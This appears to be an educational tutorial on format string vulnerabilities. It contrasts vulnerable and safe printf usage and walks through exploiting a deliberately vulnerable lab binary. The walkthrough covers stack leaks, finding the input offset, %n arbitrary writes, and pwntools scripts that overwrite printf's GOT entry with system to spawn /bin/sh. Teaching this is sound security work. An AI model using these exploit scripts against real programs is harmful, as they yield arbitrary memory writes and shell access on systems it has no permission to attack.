Format String Vulnerabilities
Overview
A format string vulnerability occurs when user-controlled input is passed
directly as the format argument to printf, fprintf, sprintf, or similar
functions. Since format specifiers like %x, %s, and %n read from or write
to the stack, an attacker can use them to leak memory contents or write
arbitrary values to arbitrary addresses.
ATT&CK Mapping
- Tactic: TA0002 - Execution
- Technique: T1203 - Exploitation for Client Execution
Prerequisites
- A binary where user input reaches a
printf-family function as the format string (not as an argument to a format string) - GDB with pwndbg for debugging
- pwntools for exploit scripting
Vulnerable vs Safe Code
// VULNERABLE — user input IS the format string
printf(user_input);
fprintf(stderr, user_input);
sprintf(buf, user_input);
// SAFE — user input is an argument, not the format string
printf("%s", user_input);
fprintf(stderr, "%s", user_input);
sprintf(buf, "%s", user_input);
Vulnerable Code Example
// fmtvuln.c — compile with: gcc -fno-stack-protector -no-pie -o fmtvuln fmtvuln.c
#include <stdio.h>
int main() {
char buf[256];
while (fgets(buf, sizeof(buf), stdin)) {
printf(buf); // format string vulnerability
}
return 0;
}
Format Specifiers for Exploitation
| Specifier | Action | Exploit Use |
|---|---|---|
%x |
Print 4 bytes from stack (hex) | Leak stack values |
%lx |
Print 8 bytes from stack (hex, 64-bit) | Leak 64-bit addresses |
%p |
Print pointer (same as 0x%lx) |
Leak addresses |
%s |
Print string at address on stack | Leak memory at pointer |
%n |
Write number of bytes printed to address on stack | Arbitrary write |
%hn |
Write 2 bytes (short) | Partial write |
%hhn |
Write 1 byte (char) | Byte-level write |
%<N>$x |
Print Nth argument (direct parameter access) | Target specific stack offset |
%<N>$n |
Write to Nth argument address | Write to specific offset |
Reading Stack Values (Information Leak)
Sequential Leak
Each %lx consumes the next 8 bytes from the stack (on x86-64):
# Send to the vulnerable binary
echo 'AAAAAAAA.%lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx' | ./fmtvuln
Output:
AAAAAAAA.7fffffffdf80.0.0.4141414141414141.252e786c252e786c.786c252e786c252e...
The value 0x4141414141414141 is the AAAAAAAA from the input itself — this tells
you where your input appears on the stack.
Direct Parameter Access
Use %N$lx to read specific stack positions without consuming intermediate
values:
# Read the 6th argument from the stack
echo '%6$lx' | ./fmtvuln
# Read positions 1 through 20
for i in $(seq 1 20); do echo "%${i}\$p" | ./fmtvuln; done
Finding Your Input Offset
The offset where your input appears on the stack is critical for write
exploits. Identify it by looking for 0x4141414141414141 in the output:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = './fmtvuln'
# Find the offset where our input appears on the stack
for i in range(1, 30):
p = process('./fmtvuln')
p.sendline(f'AAAAAAAA%{i}$lx'.encode())
result = p.recvline()
if b'4141414141414141' in result:
log.success(f'Input at offset: {i}')
break
p.close()
Arbitrary Write with %n
The %n specifier writes the number of characters printed so far to the
address pointed to by the corresponding argument. By placing a target address
on the stack (in your input buffer) and using %n at the correct offset, you
write to that address.
Writing a Small Value
To write the value 0x42 (66 decimal) to address 0x404060:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = './fmtvuln'
target_addr = 0x404060 # address to write to
write_value = 0x42 # value to write
input_offset = 6 # where our input appears on the stack
# Pad output to write_value bytes, then use %hhn to write 1 byte
payload = p64(target_addr)
payload += f'%{write_value - 8}c%{input_offset}$hhn'.encode()
p = process('./fmtvuln')
p.sendline(payload)
pwntools fmtstr_payload
pwntools provides fmtstr_payload() to automate format string writes:
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = elf = ELF('./fmtvuln')
# Offset where input appears on the stack
input_offset = 6
# Write a value to an address
# fmtstr_payload(offset, {addr: value})
payload = fmtstr_payload(input_offset, {elf.got['printf']: elf.symbols['system']})
p = process('./fmtvuln')
p.sendline(payload)
p.sendline(b'/bin/sh') # next printf call now calls system("/bin/sh")
p.interactive()
fmtstr_payload parameters:
- First argument: the stack offset where input appears
- Second argument: dictionary of {address: value} pairs to write
GOT Overwrite via Format String
The Global Offset Table (GOT) maps library function names to their runtime addresses. On binaries with Partial RELRO, the GOT is writable. Overwriting a GOT entry redirects future calls to that function.
Common targets:
| Overwrite | With | Effect |
|---|---|---|
printf@GOT |
system |
Next printf(input) becomes system(input) |
puts@GOT |
system |
Next puts(input) becomes system(input) |
exit@GOT |
main |
Prevents exit, loops back for more writes |
# pwntools
# https://github.com/Gallopsled/pwntools
from pwn import *
context.binary = elf = ELF('./fmtvuln')
# Overwrite printf GOT entry with system
payload = fmtstr_payload(6, {elf.got['printf']: elf.symbols['system']})
p = process('./fmtvuln')
p.sendline(payload)
# Now printf calls system — send a command
p.sendline(b'/bin/sh')
p.interactive()
This only works with: - Partial RELRO (GOT is writable) - No PIE (GOT address is known) — or PIE with a leaked binary base
Debugging Format Strings
# GDB
# https://www.gnu.org/software/gdb/
gdb ./fmtvuln
# Break at printf
(gdb) break printf
# Run and send format string
(gdb) run <<< "AAAA%6$lx"
# When printf is hit, examine the stack
(gdb) x/20xg $rsp
# The format string arguments start at RSI (2nd arg), RDX (3rd),
# RCX (4th), R8 (5th), R9 (6th), then stack positions